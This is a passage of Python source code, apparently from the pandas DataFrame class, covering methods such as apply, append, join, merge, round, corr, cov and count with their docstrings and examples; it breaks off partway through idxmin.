1 NaN NaN NaN
2 NaN NaN NaN
3 3.0 2.0 15.0
4 3.0 4.0 21.0
5 3.0 6.0 27.0
Difference with following row
>>> df.diff(periods=-1)
a b c
0 -1.0 0.0 -3.0
1 -1.0 -1.0 -5.0
2 -1.0 -1.0 -7.0
3 -1.0 -2.0 -9.0
4 -1.0 -3.0 -11.0
5 NaN NaN NaN
"""
bm_axis = self._get_block_manager_axis(axis)
new_data = self._data.diff(n=periods, axis=bm_axis)
return self._constructor(new_data)
# ----------------------------------------------------------------------
# Function application
def _gotitem(self, key, ndim, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
if subset is None:
subset = self
# TODO: _shallow_copy(subset)?
return self[key]
_agg_doc = dedent("""
The aggregation operations are always performed over an axis, either the
index (default) or the column axis. This behavior is different from
`numpy` aggregation functions (`mean`, `median`, `prod`, `sum`, `std`,
`var`), where the default is to compute the aggregation of the flattened
array, e.g., ``numpy.mean(arr_2d)`` as opposed to ``numpy.mean(arr_2d,
axis=0)``.
`agg` is an alias for `aggregate`. Use the alias.
Examples
--------
>>> df = pd.DataFrame([[1, 2, 3],
... [4, 5, 6],
... [7, 8, 9],
... [np.nan, np.nan, np.nan]],
... columns=['A', 'B', 'C'])
Aggregate these functions over the rows.
>>> df.agg(['sum', 'min'])
A B C
sum 12.0 15.0 18.0
min 1.0 2.0 3.0
Different aggregations per column.
>>> df.agg({'A' : ['sum', 'min'], 'B' : ['min', 'max']})
A B
max NaN 8.0
min 1.0 2.0
sum 12.0 NaN
Aggregate over the columns.
>>> df.agg("mean", axis="columns")
0 2.0
1 5.0
2 8.0
3 NaN
dtype: float64
See also
--------
DataFrame.apply : Perform any type of operations.
DataFrame.transform : Perform transformation type operations.
pandas.core.groupby.GroupBy : Perform operations over groups.
pandas.core.resample.Resampler : Perform operations over resampled bins.
pandas.core.window.Rolling : Perform operations over rolling window.
pandas.core.window.Expanding : Perform operations over expanding window.
pandas.core.window.EWM : Perform operation over exponential weighted
window.
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='.. versionadded:: 0.20.0',
**_shared_doc_kwargs))
def aggregate(self, func, axis=0, *args, **kwargs):
axis = self._get_axis_number(axis)
# TODO: flipped axis
result = None
if axis == 0:
try:
result, how = self._aggregate(func, axis=0, *args, **kwargs)
except TypeError:
pass
if result is None:
return self.apply(func, axis=axis, args=args, **kwargs)
return result
agg = aggregate
def apply(self, func, axis=0, broadcast=None, raw=False, reduce=None,
result_type=None, args=(), **kwds):
"""
Apply a function along an axis of the DataFrame.
Objects passed to the function are Series objects whose index is
either the DataFrame's index (``axis=0``) or the DataFrame's columns
(``axis=1``). By default (``result_type=None``), the final return type
is inferred from the return type of the applied function. Otherwise,
it depends on the `result_type` argument.
Parameters
----------
func : function
Function to apply to each column or row.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis along which the function is applied:
* 0 or 'index': apply function to each column.
* 1 or 'columns': apply function to each row.
broadcast : bool, optional
Only relevant for aggregation functions:
* ``False`` or ``None`` : returns a Series whose length is the
length of the index or the number of columns (based on the
`axis` parameter)
* ``True`` : results will be broadcast to the original shape
of the frame, the original index and columns will be retained.
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='broadcast'.
raw : bool, default False
* ``False`` : passes each row or column as a Series to the
function.
* ``True`` : the passed function will receive ndarray objects
instead.
If you are just applying a NumPy reduction function this will
achieve much better performance.
reduce : bool or None, default None
Try to apply reduction procedures. If the DataFrame is empty,
`apply` will use `reduce` to determine whether the result
should be a Series or a DataFrame. If ``reduce=None`` (the
default), `apply`'s return value will be guessed by calling
`func` on an empty Series
(note: while guessing, exceptions raised by `func` will be
ignored).
If ``reduce=True`` a Series will always be returned, and if
``reduce=False`` a DataFrame will always be returned.
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by ``result_type='reduce'``.
result_type : {'expand', 'reduce', 'broadcast', None}, default None
These only act when ``axis=1`` (columns):
* 'expand' : list-like results will be turned into columns.
* 'reduce' : returns a Series if possible rather than expanding
list-like results. This is the opposite of 'expand'.
* 'broadcast' : results will be broadcast to the original shape
of the DataFrame, the original index and columns will be
retained.
The default behaviour (None) depends on the return value of the
applied function: list-like results will be returned as a Series
of those. However if the apply function returns a Series these
are expanded to columns.
.. versionadded:: 0.23.0
args : tuple
Positional arguments to pass to `func` in addition to the
array/series.
**kwds
Additional keyword arguments to pass as keywords arguments to
`func`.
Notes
-----
In the current implementation apply calls `func` twice on the
first column/row to decide whether it can take a fast or slow
code path. This can lead to unexpected behavior if `func` has
side-effects, as they will take effect twice for the first
column/row.
See also
--------
DataFrame.applymap: For elementwise operations
DataFrame.aggregate: only perform aggregating type operations
DataFrame.transform: only perform transformating type operations
Examples
--------
>>> df = pd.DataFrame([[4, 9],] * 3, columns=['A', 'B'])
>>> df
A B
0 4 9
1 4 9
2 4 9
Using a numpy universal function (in this case the same as
``np.sqrt(df)``):
>>> df.apply(np.sqrt)
A B
0 2.0 3.0
1 2.0 3.0
2 2.0 3.0
Using a reducing function on either axis
>>> df.apply(np.sum, axis=0)
A 12
B 27
dtype: int64
>>> df.apply(np.sum, axis=1)
0 13
1 13
2 13
dtype: int64
Retuning a list-like will result in a Series
>>> df.apply(lambda x: [1, 2], axis=1)
0 [1, 2]
1 [1, 2]
2 [1, 2]
dtype: object
Passing result_type='expand' will expand list-like results
to columns of a Dataframe
>>> df.apply(lambda x: [1, 2], axis=1, result_type='expand')
0 1
0 1 2
1 1 2
2 1 2
Returning a Series inside the function is similar to passing
``result_type='expand'``. The resulting column names
will be the Series index.
>>> df.apply(lambda x: pd.Series([1, 2], index=['foo', 'bar']), axis=1)
foo bar
0 1 2
1 1 2
2 1 2
Passing ``result_type='broadcast'`` will ensure the same shape
result, whether list-like or scalar is returned by the function,
and broadcast it along the axis. The resulting column names will
be the originals.
>>> df.apply(lambda x: [1, 2], axis=1, result_type='broadcast')
A B
0 1 2
1 1 2
2 1 2
Returns
-------
applied : Series or DataFrame
"""
from pandas.core.apply import frame_apply
op = frame_apply(self,
func=func,
axis=axis,
broadcast=broadcast,
raw=raw,
reduce=reduce,
result_type=result_type,
args=args,
kwds=kwds)
return op.get_result()
def applymap(self, func):
"""
Apply a function to a Dataframe elementwise.
This method applies a function that accepts and returns a scalar
to every element of a DataFrame.
Parameters
----------
func : callable
Python function, returns a single value from a single value.
Returns
-------
DataFrame
Transformed DataFrame.
See also
--------
DataFrame.apply : Apply a function along input axis of DataFrame
Examples
--------
>>> df = pd.DataFrame([[1, 2.12], [3.356, 4.567]])
>>> df
0 1
0 1.000 2.120
1 3.356 4.567
>>> df.applymap(lambda x: len(str(x)))
0 1
0 3 4
1 5 5
Note that a vectorized version of `func` often exists, which will
be much faster. You could square each number elementwise.
>>> df.applymap(lambda x: x**2)
0 1
0 1.000000 4.494400
1 11.262736 20.857489
But it's better to avoid applymap in that case.
>>> df ** 2
0 1
0 1.000000 4.494400
1 11.262736 20.857489
"""
# if we have a dtype == 'M8[ns]', provide boxed values
def infer(x):
if x.empty:
return lib.map_infer(x, func)
return lib.map_infer(x.astype(object).values, func)
return self.apply(infer)
# ----------------------------------------------------------------------
# Merging / joining methods
def append(self, other, ignore_index=False, verify_integrity=False):
"""
Append rows of `other` to the end of this frame, returning a new
object. Columns not in this frame are added as new columns.
Parameters
----------
other : DataFrame or Series/dict-like object, or list of these
The data to append.
ignore_index : boolean, default False
If True, do not use the index labels.
verify_integrity : boolean, default False
If True, raise ValueError on creating index with duplicates.
Returns
-------
appended : DataFrame
Notes
-----
If a list of dict/series is passed and the keys are all contained in
the DataFrame's index, the order of the columns in the resulting
DataFrame will be unchanged.
Iteratively appending rows to a DataFrame can be more computationally
intensive than a single concatenate. A better solution is to append
those rows to a list and then concatenate the list with the original
DataFrame all at once.
See also
--------
pandas.concat : General function to concatenate DataFrame, Series
or Panel objects
Examples
--------
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=list('AB'))
>>> df
A B
0 1 2
1 3 4
>>> df2 = pd.DataFrame([[5, 6], [7, 8]], columns=list('AB'))
>>> df.append(df2)
A B
0 1 2
1 3 4
0 5 6
1 7 8
With `ignore_index` set to True:
>>> df.append(df2, ignore_index=True)
A B
0 1 2
1 3 4
2 5 6
3 7 8
The following, while not recommended methods for generating DataFrames,
show two ways to generate a DataFrame from multiple data sources.
Less efficient:
>>> df = pd.DataFrame(columns=['A'])
>>> for i in range(5):
... df = df.append({'A': i}, ignore_index=True)
>>> df
A
0 0
1 1
2 2
3 3
4 4
More efficient:
>>> pd.concat([pd.DataFrame([i], columns=['A']) for i in range(5)],
... ignore_index=True)
A
0 0
1 1
2 2
3 3
4 4
"""
if isinstance(other, (Series, dict)):
if isinstance(other, dict):
other = Series(other)
if other.name is None and not ignore_index:
raise TypeError('Can only append a Series if ignore_index=True'
' or if the Series has a name')
if other.name is None:
index = None
else:
# other must have the same index name as self, otherwise
# index name will be reset
index = Index([other.name], name=self.index.name)
combined_columns = self.columns.tolist() + self.columns.union(
other.index).difference(self.columns).tolist()
other = other.reindex(combined_columns, copy=False)
other = DataFrame(other.values.reshape((1, len(other))),
index=index,
columns=combined_columns)
other = other._convert(datetime=True, timedelta=True)
if not self.columns.equals(combined_columns):
self = self.reindex(columns=combined_columns)
elif isinstance(other, list) and not isinstance(other[0], DataFrame):
other = DataFrame(other)
if (self.columns.get_indexer(other.columns) >= 0).all():
other = other.loc[:, self.columns]
from pandas.core.reshape.concat import concat
if isinstance(other, (list, tuple)):
to_concat = [self] + other
else:
to_concat = [self, other]
return concat(to_concat, ignore_index=ignore_index,
verify_integrity=verify_integrity)
def join(self, other, on=None, how='left', lsuffix='', rsuffix='',
         sort=False):
    """
    Join columns with other DataFrame either on index or on a key
    column. Efficiently Join multiple DataFrame objects by index at once by
    passing a list.
    Parameters
    ----------
    other : DataFrame, Series with name field set, or list of DataFrame
        Index should be similar to one of the columns in this one. If a
        Series is passed, its name attribute must be set, and that will be
        used as the column name in the resulting joined DataFrame
    on : name, tuple/list of names, or array-like
        Column or index level name(s) in the caller to join on the index
        in `other`, otherwise joins index-on-index. If multiple
        values given, the `other` DataFrame must have a MultiIndex. Can
        pass an array as the join key if it is not already contained in
        the calling DataFrame. Like an Excel VLOOKUP operation
    how : {'left', 'right', 'outer', 'inner'}, default: 'left'
        How to handle the operation of the two objects.
        * left: use calling frame's index (or column if on is specified)
        * right: use other frame's index
        * outer: form union of calling frame's index (or column if on is
          specified) with other frame's index, and sort it
          lexicographically
        * inner: form intersection of calling frame's index (or column if
          on is specified) with other frame's index, preserving the order
          of the calling's one
    lsuffix : string
        Suffix to use from left frame's overlapping columns
    rsuffix : string
        Suffix to use from right frame's overlapping columns
    sort : boolean, default False
        Order result DataFrame lexicographically by the join key. If False,
        the order of the join key depends on the join type (how keyword)
    Notes
    -----
    on, lsuffix, and rsuffix options are not supported when passing a list
    of DataFrame objects
    Support for specifying index levels as the `on` parameter was added
    in version 0.23.0
    Examples
    --------
    >>> caller = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3', 'K4', 'K5'],
    ...                        'A': ['A0', 'A1', 'A2', 'A3', 'A4', 'A5']})
    >>> caller
        A key
    0  A0  K0
    1  A1  K1
    2  A2  K2
    3  A3  K3
    4  A4  K4
    5  A5  K5
    >>> other = pd.DataFrame({'key': ['K0', 'K1', 'K2'],
    ...                       'B': ['B0', 'B1', 'B2']})
    >>> other
        B key
    0  B0  K0
    1  B1  K1
    2  B2  K2
    Join DataFrames using their indexes.
    >>> caller.join(other, lsuffix='_caller', rsuffix='_other')
        A key_caller    B key_other
    0  A0         K0   B0        K0
    1  A1         K1   B1        K1
    2  A2         K2   B2        K2
    3  A3         K3  NaN       NaN
    4  A4         K4  NaN       NaN
    5  A5         K5  NaN       NaN
    If we want to join using the key columns, we need to set key to be
    the index in both caller and other. The joined DataFrame will have
    key as its index.
    >>> caller.set_index('key').join(other.set_index('key'))
          A    B
    key
    K0   A0   B0
    K1   A1   B1
    K2   A2   B2
    K3   A3  NaN
    K4   A4  NaN
    K5   A5  NaN
    Another option to join using the key columns is to use the on
    parameter. DataFrame.join always uses other's index but we can use any
    column in the caller. This method preserves the original caller's
    index in the result.
    >>> caller.join(other.set_index('key'), on='key')
        A key    B
    0  A0  K0   B0
    1  A1  K1   B1
    2  A2  K2   B2
    3  A3  K3  NaN
    4  A4  K4  NaN
    5  A5  K5  NaN
    See also
    --------
    DataFrame.merge : For column(s)-on-columns(s) operations
    Returns
    -------
    joined : DataFrame
    """
    # For SparseDataFrame's benefit
    # Pure delegation: the real dispatch (merge vs. concat) lives in
    # _join_compat so sparse subclasses can reuse it.
    return self._join_compat(other, on=on, how=how, lsuffix=lsuffix,
                             rsuffix=rsuffix, sort=sort)
def _join_compat(self, other, on=None, how='left', lsuffix='', rsuffix='',
                 sort=False):
    # Shared implementation behind DataFrame.join.  A single
    # DataFrame/Series joins via merge(); a list/tuple of frames joins
    # index-on-index via concat() when all indexes are unique, otherwise
    # via repeated pairwise merges.
    from pandas.core.reshape.merge import merge
    from pandas.core.reshape.concat import concat
    if isinstance(other, Series):
        # A Series must carry a name so it can become a column label.
        if other.name is None:
            raise ValueError('Other Series must have a name')
        other = DataFrame({other.name: other})
    if isinstance(other, DataFrame):
        # left_index is only False when joining on a caller column (``on``).
        return merge(self, other, left_on=on, how=how,
                     left_index=on is None, right_index=True,
                     suffixes=(lsuffix, rsuffix), sort=sort)
    else:
        if on is not None:
            raise ValueError('Joining multiple DataFrames only supported'
                             ' for joining on index')
        frames = [self] + list(other)
        can_concat = all(df.index.is_unique for df in frames)
        # join indexes only using concat
        if can_concat:
            # A left join keyed on self's index is expressed as an outer
            # concat restricted to self's index via join_axes.
            if how == 'left':
                how = 'outer'
                join_axes = [self.index]
            else:
                join_axes = None
            return concat(frames, axis=1, join=how, join_axes=join_axes,
                          verify_integrity=True)
        # Fallback when some index has duplicates: chain pairwise merges.
        joined = frames[0]
        for frame in frames[1:]:
            joined = merge(joined, frame, how=how, left_index=True,
                           right_index=True)
        return joined
@Substitution('')
@Appender(_merge_doc, indents=2)
def merge(self, right, how='inner', on=None, left_on=None, right_on=None,
          left_index=False, right_index=False, sort=False,
          suffixes=('_x', '_y'), copy=True, indicator=False,
          validate=None):
    # Thin wrapper around the top-level merge implementation; every
    # keyword is forwarded unchanged.  (Docstring is attached by the
    # @Appender decorator above, so none is written here.)
    from pandas.core.reshape.merge import merge as _merge_impl
    return _merge_impl(self, right, how=how, on=on, left_on=left_on,
                       right_on=right_on, left_index=left_index,
                       right_index=right_index, sort=sort,
                       suffixes=suffixes, copy=copy, indicator=indicator,
                       validate=validate)
def round(self, decimals=0, *args, **kwargs):
    """
    Round a DataFrame to a variable number of decimal places.

    Parameters
    ----------
    decimals : int, dict, Series
        Number of decimal places to round each column to. If an int is
        given, round each column to the same number of places.
        Otherwise dict and Series round to variable numbers of places.
        Column names should be in the keys if `decimals` is a
        dict-like, or in the index if `decimals` is a Series. Any
        columns not included in `decimals` will be left as is. Elements
        of `decimals` which are not columns of the input will be
        ignored.

    Returns
    -------
    DataFrame object

    See Also
    --------
    numpy.around
    Series.round
    """
    from pandas.core.reshape.concat import concat

    def _round_one(column, ndigits):
        # Only int/float columns are rounded; everything else is
        # returned untouched.
        if is_integer_dtype(column) or is_float_dtype(column):
            return column.round(ndigits)
        return column

    def _round_by_mapping(frame, mapping):
        # Columns missing from ``mapping`` pass through unchanged.
        for label, column in frame.iteritems():
            try:
                yield _round_one(column, mapping[label])
            except KeyError:
                yield column

    # reject positional/keyword args numpy.round would accept but we don't
    nv.validate_round(args, kwargs)
    if isinstance(decimals, (dict, Series)):
        if isinstance(decimals, Series) and not decimals.index.is_unique:
            raise ValueError("Index of decimals must be unique")
        rounded_columns = list(_round_by_mapping(self, decimals))
    elif is_integer(decimals):
        # Dispatch to Series.round
        rounded_columns = [_round_one(column, decimals)
                           for _, column in self.iteritems()]
    else:
        raise TypeError("decimals must be an integer, a dict-like or a "
                        "Series")
    if not rounded_columns:
        return self
    return self._constructor(concat(rounded_columns, axis=1),
                             index=self.index,
                             columns=self.columns)
# ----------------------------------------------------------------------
# Statistical methods, etc.
def corr(self, method='pearson', min_periods=1):
    """
    Compute pairwise correlation of columns, excluding NA/null values
    Parameters
    ----------
    method : {'pearson', 'kendall', 'spearman'}
        * pearson : standard correlation coefficient
        * kendall : Kendall Tau correlation coefficient
        * spearman : Spearman rank correlation
    min_periods : int, optional
        Minimum number of observations required per pair of columns
        to have a valid result. Currently only available for pearson
        and spearman correlation
    Returns
    -------
    y : DataFrame
    """
    numeric_df = self._get_numeric_data()
    cols = numeric_df.columns
    idx = cols.copy()
    mat = numeric_df.values
    if method == 'pearson':
        # NaN-aware C implementation (honors min_periods).
        correl = libalgos.nancorr(_ensure_float64(mat), minp=min_periods)
    elif method == 'spearman':
        correl = libalgos.nancorr_spearman(_ensure_float64(mat),
                                           minp=min_periods)
    else:
        # Generic path (e.g. kendall): O(K^2) Python loop over column
        # pairs; only the upper triangle is computed, then mirrored.
        if min_periods is None:
            min_periods = 1
        mat = _ensure_float64(mat).T
        corrf = nanops.get_corr_func(method)
        K = len(cols)
        correl = np.empty((K, K), dtype=float)
        mask = np.isfinite(mat)
        for i, ac in enumerate(mat):
            for j, bc in enumerate(mat):
                if i > j:
                    continue
                # rows valid in *both* columns
                valid = mask[i] & mask[j]
                if valid.sum() < min_periods:
                    c = np.nan
                elif i == j:
                    c = 1.
                elif not valid.all():
                    c = corrf(ac[valid], bc[valid])
                else:
                    c = corrf(ac, bc)
                correl[i, j] = c
                correl[j, i] = c
    return self._constructor(correl, index=idx, columns=cols)
def cov(self, min_periods=None):
    """
    Compute pairwise covariance of columns, excluding NA/null values.
    Compute the pairwise covariance among the series of a DataFrame.
    The returned data frame is the `covariance matrix
    <https://en.wikipedia.org/wiki/Covariance_matrix>`__ of the columns
    of the DataFrame.
    Both NA and null values are automatically excluded from the
    calculation. (See the note below about bias from missing values.)
    A threshold can be set for the minimum number of
    observations for each value created. Comparisons with observations
    below this threshold will be returned as ``NaN``.
    This method is generally used for the analysis of time series data to
    understand the relationship between different measures
    across time.
    Parameters
    ----------
    min_periods : int, optional
        Minimum number of observations required per pair of columns
        to have a valid result.
    Returns
    -------
    DataFrame
        The covariance matrix of the series of the DataFrame.
    See Also
    --------
    pandas.Series.cov : compute covariance with another Series
    pandas.core.window.EWM.cov: exponential weighted sample covariance
    pandas.core.window.Expanding.cov : expanding sample covariance
    pandas.core.window.Rolling.cov : rolling sample covariance
    Notes
    -----
    Returns the covariance matrix of the DataFrame's time series.
    The covariance is normalized by N-1.
    For DataFrames that have Series that are missing data (assuming that
    data is `missing at random
    <https://en.wikipedia.org/wiki/Missing_data#Missing_at_random>`__)
    the returned covariance matrix will be an unbiased estimate
    of the variance and covariance between the member Series.
    However, for many applications this estimate may not be acceptable
    because the estimate covariance matrix is not guaranteed to be positive
    semi-definite. This could lead to estimate correlations having
    absolute values which are greater than one, and/or a non-invertible
    covariance matrix. See `Estimation of covariance matrices
    <http://en.wikipedia.org/w/index.php?title=Estimation_of_covariance_
    matrices>`__ for more details.
    Examples
    --------
    >>> df = pd.DataFrame([(1, 2), (0, 3), (2, 0), (1, 1)],
    ...                   columns=['dogs', 'cats'])
    >>> df.cov()
              dogs      cats
    dogs  0.666667 -1.000000
    cats -1.000000  1.666667
    >>> np.random.seed(42)
    >>> df = pd.DataFrame(np.random.randn(1000, 5),
    ...                   columns=['a', 'b', 'c', 'd', 'e'])
    >>> df.cov()
              a         b         c         d         e
    a  0.998438 -0.020161  0.059277 -0.008943  0.014144
    b -0.020161  1.059352 -0.008543 -0.024738  0.009826
    c  0.059277 -0.008543  1.010670 -0.001486 -0.000271
    d -0.008943 -0.024738 -0.001486  0.921297 -0.013692
    e  0.014144  0.009826 -0.000271 -0.013692  0.977795
    **Minimum number of periods**
    This method also supports an optional ``min_periods`` keyword
    that specifies the required minimum number of non-NA observations for
    each column pair in order to have a valid result:
    >>> np.random.seed(42)
    >>> df = pd.DataFrame(np.random.randn(20, 3),
    ...                   columns=['a', 'b', 'c'])
    >>> df.loc[df.index[:5], 'a'] = np.nan
    >>> df.loc[df.index[5:10], 'b'] = np.nan
    >>> df.cov(min_periods=12)
              a         b         c
    a  0.316741       NaN -0.150812
    b       NaN  1.248003  0.191417
    c -0.150812  0.191417  0.895202
    """
    numeric_df = self._get_numeric_data()
    cols = numeric_df.columns
    idx = cols.copy()
    mat = numeric_df.values
    if notna(mat).all():
        # No missing values: use NumPy's covariance directly.
        if min_periods is not None and min_periods > len(mat):
            # Fewer rows than required observations: all-NaN result.
            baseCov = np.empty((mat.shape[1], mat.shape[1]))
            baseCov.fill(np.nan)
        else:
            baseCov = np.cov(mat.T)
            # np.cov collapses to a scalar for a single column; restore 2-D
            baseCov = baseCov.reshape((len(cols), len(cols)))
    else:
        # Missing values present: pairwise-complete C helper.
        baseCov = libalgos.nancorr(_ensure_float64(mat), cov=True,
                                   minp=min_periods)
    return self._constructor(baseCov, index=idx, columns=cols)
def corrwith(self, other, axis=0, drop=False):
    """
    Compute pairwise correlation between rows or columns of two DataFrame
    objects.
    Parameters
    ----------
    other : DataFrame, Series
    axis : {0 or 'index', 1 or 'columns'}, default 0
        0 or 'index' to compute column-wise, 1 or 'columns' for row-wise
    drop : boolean, default False
        Drop missing indices from result, default returns union of all
    Returns
    -------
    correls : Series
    """
    axis = self._get_axis_number(axis)
    this = self._get_numeric_data()
    if isinstance(other, Series):
        # Series case: correlate each column/row against the Series.
        return this.apply(other.corr, axis=axis)
    other = other._get_numeric_data()
    left, right = this.align(other, join='inner', copy=False)
    # mask missing values
    # Adding ``other * 0`` propagates NaNs from either frame into both,
    # so each pairwise statistic below uses only jointly-valid entries.
    left = left + right * 0
    right = right + left * 0
    if axis == 1:
        left = left.T
        right = right.T
    # demeaned data
    ldem = left - left.mean()
    rdem = right - right.mean()
    # Pearson correlation: covariance over product of std deviations.
    num = (ldem * rdem).sum()
    dom = (left.count() - 1) * left.std() * right.std()
    correl = num / dom
    if not drop:
        # Re-include labels dropped by the inner alignment as NaN.
        raxis = 1 if axis == 0 else 0
        result_index = this._get_axis(raxis).union(other._get_axis(raxis))
        correl = correl.reindex(result_index)
    return correl
# ----------------------------------------------------------------------
# ndarray-like stats methods
def count(self, axis=0, level=None, numeric_only=False):
    """
    Count non-NA cells for each column or row.
    The values `None`, `NaN`, `NaT`, and optionally `numpy.inf` (depending
    on `pandas.options.mode.use_inf_as_na`) are considered NA.
    Parameters
    ----------
    axis : {0 or 'index', 1 or 'columns'}, default 0
        If 0 or 'index' counts are generated for each column.
        If 1 or 'columns' counts are generated for each **row**.
    level : int or str, optional
        If the axis is a `MultiIndex` (hierarchical), count along a
        particular `level`, collapsing into a `DataFrame`.
        A `str` specifies the level name.
    numeric_only : boolean, default False
        Include only `float`, `int` or `boolean` data.
    Returns
    -------
    Series or DataFrame
        For each column/row the number of non-NA/null entries.
        If `level` is specified returns a `DataFrame`.
    See Also
    --------
    Series.count: number of non-NA elements in a Series
    DataFrame.shape: number of DataFrame rows and columns (including NA
        elements)
    DataFrame.isna: boolean same-sized DataFrame showing places of NA
        elements
    Examples
    --------
    Constructing DataFrame from a dictionary:
    >>> df = pd.DataFrame({"Person":
    ...                    ["John", "Myla", None, "John", "Myla"],
    ...                    "Age": [24., np.nan, 21., 33, 26],
    ...                    "Single": [False, True, True, True, False]})
    >>> df
       Person   Age  Single
    0    John  24.0   False
    1    Myla   NaN    True
    2    None  21.0    True
    3    John  33.0    True
    4    Myla  26.0   False
    Notice the uncounted NA values:
    >>> df.count()
    Person    4
    Age       4
    Single    5
    dtype: int64
    Counts for each **row**:
    >>> df.count(axis='columns')
    0    3
    1    2
    2    2
    3    3
    4    3
    dtype: int64
    Counts for one level of a `MultiIndex`:
    >>> df.set_index(["Person", "Single"]).count(level="Person")
            Age
    Person
    John      2
    Myla      1
    """
    axis = self._get_axis_number(axis)
    if level is not None:
        # Level-wise counting collapses the MultiIndex axis to a frame.
        return self._count_level(level, axis=axis,
                                 numeric_only=numeric_only)
    if numeric_only:
        frame = self._get_numeric_data()
    else:
        frame = self
    # GH #423
    if len(frame._get_axis(axis)) == 0:
        # Empty along the counted axis: all counts are zero.
        result = Series(0, index=frame._get_agg_axis(axis))
    else:
        if frame._is_mixed_type or frame._data.any_extension_types:
            # the or any_extension_types is really only hit for single-
            # column frames with an extension array
            result = notna(frame).sum(axis=axis)
        else:
            # GH13407
            series_counts = notna(frame).sum(axis=axis)
            counts = series_counts.values
            result = Series(counts, index=frame._get_agg_axis(axis))
    return result.astype('int64')
def _count_level(self, level, axis=0, numeric_only=False):
    # Count non-NA cells grouped by one level of a MultiIndex axis.
    # Returns a DataFrame indexed by the level's values.
    if numeric_only:
        frame = self._get_numeric_data()
    else:
        frame = self
    count_axis = frame._get_axis(axis)
    agg_axis = frame._get_agg_axis(axis)
    if not isinstance(count_axis, MultiIndex):
        raise TypeError("Can only count levels on hierarchical %s." %
                        self._get_axis_name(axis))
    if frame._is_mixed_type:
        # Since we have mixed types, calling notna(frame.values) might
        # upcast everything to object
        mask = notna(frame).values
    else:
        # But use the speedup when we have homogeneous dtypes
        mask = notna(frame.values)
    if axis == 1:
        # We're transposing the mask rather than frame to avoid potential
        # upcasts to object, which induces a ~20x slowdown
        mask = mask.T
    if isinstance(level, compat.string_types):
        # allow the level to be named
        level = count_axis._get_level_number(level)
    level_index = count_axis.levels[level]
    labels = _ensure_int64(count_axis.labels[level])
    # C-level 2-D bincount over the level codes
    counts = lib.count_level_2d(mask, labels, len(level_index), axis=0)
    result = DataFrame(counts, index=level_index, columns=agg_axis)
    if axis == 1:
        # Undo our earlier transpose
        return result.T
    else:
        return result
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
            filter_type=None, **kwds):
    # Common engine behind reductions (sum/mean/min/...).  ``op`` is a
    # nanops reduction applied over ``axis``; ``filter_type`` selects
    # which dtypes participate (None/'numeric' vs 'bool').  When
    # ``numeric_only`` is None, a whole-block reduction is attempted
    # first and failures fall back to column-by-column / numeric-only.
    axis = self._get_axis_number(axis)
    def f(x):
        return op(x, axis=axis, skipna=skipna, **kwds)
    labels = self._get_agg_axis(axis)
    # exclude timedelta/datetime unless we are uniform types
    if axis == 1 and self._is_mixed_type and self._is_datelike_mixed_type:
        numeric_only = True
    if numeric_only is None:
        try:
            values = self.values
            result = f(values)
        except Exception as e:
            # try by-column first
            if filter_type is None and axis == 0:
                try:
                    # this can end up with a non-reduction
                    # but not always. if the types are mixed
                    # with datelike then need to make sure a series
                    # we only end up here if we have not specified
                    # numeric_only and yet we have tried a
                    # column-by-column reduction, where we have mixed type.
                    # So let's just do what we can
                    from pandas.core.apply import frame_apply
                    opa = frame_apply(self,
                                      func=f,
                                      result_type='expand',
                                      ignore_failures=True)
                    result = opa.get_result()
                    if result.ndim == self.ndim:
                        result = result.iloc[0]
                    return result
                except Exception:
                    pass
            if filter_type is None or filter_type == 'numeric':
                data = self._get_numeric_data()
            elif filter_type == 'bool':
                data = self._get_bool_data()
            else:  # pragma: no cover
                e = NotImplementedError("Handling exception with filter_"
                                        "type %s not implemented." %
                                        filter_type)
                raise_with_traceback(e)
            with np.errstate(all='ignore'):
                result = f(data.values)
            labels = data._get_agg_axis(axis)
    else:
        if numeric_only:
            if filter_type is None or filter_type == 'numeric':
                data = self._get_numeric_data()
            elif filter_type == 'bool':
                data = self._get_bool_data()
            else:  # pragma: no cover
                msg = ("Generating numeric_only data with filter_type %s"
                       "not supported." % filter_type)
                raise NotImplementedError(msg)
            values = data.values
            labels = data._get_agg_axis(axis)
        else:
            values = self.values
        result = f(values)
    # downcast an object-dtype result back to float/bool where possible
    if hasattr(result, 'dtype') and is_object_dtype(result.dtype):
        try:
            if filter_type is None or filter_type == 'numeric':
                result = result.astype(np.float64)
            elif filter_type == 'bool' and notna(result).all():
                result = result.astype(np.bool_)
        except (ValueError, TypeError):
            # try to coerce to the original dtypes item by item if we can
            if axis == 0:
                result = coerce_to_dtypes(result, self.dtypes)
    return Series(result, index=labels)
def nunique(self, axis=0, dropna=True):
    """
    Return Series with number of distinct observations over requested
    axis.

    .. versionadded:: 0.20.0

    Parameters
    ----------
    axis : {0 or 'index', 1 or 'columns'}, default 0
    dropna : boolean, default True
        Don't include NaN in the counts.

    Returns
    -------
    nunique : Series

    Examples
    --------
    >>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 1, 1]})
    >>> df.nunique()
    A    3
    B    1
    >>> df.nunique(axis=1)
    0    1
    1    2
    2    2
    """
    # Delegate to Series.nunique per column (axis=0) or per row (axis=1).
    return self.apply(lambda ser: ser.nunique(dropna=dropna), axis=axis)
def idxmin(self, axis=0, skipna=True):
    """
    Return index of first occurrence of minimum over requested axis.
    NA/null values are excluded.

    Parameters
    ----------
    axis : {0 or 'index', 1 or 'columns'}, default 0
        0 or 'index' for row-wise, 1 or 'columns' for column-wise
    skipna : boolean, default True
        Exclude NA/null values. If an entire row/column is NA, the result
        will be NA.

    Raises
    ------
    ValueError
        * If the row/column is empty

    Returns
    -------
    idxmin : Series

    Notes
    -----
    This method is the DataFrame version of ``ndarray.argmin``.

    See Also
    --------
    Series.idxmin
    """
    axis = self._get_axis_number(axis)
    # Positional argmin per column (axis=0) or per row (axis=1); a
    # negative position marks an all-NA slice and maps to NaN below.
    positions = nanops.nanargmin(self.values, axis=axis, skipna=skipna)
    axis_labels = self._get_axis(axis)
    picked = [axis_labels[pos] if pos >= 0 else np.nan
              for pos in positions]
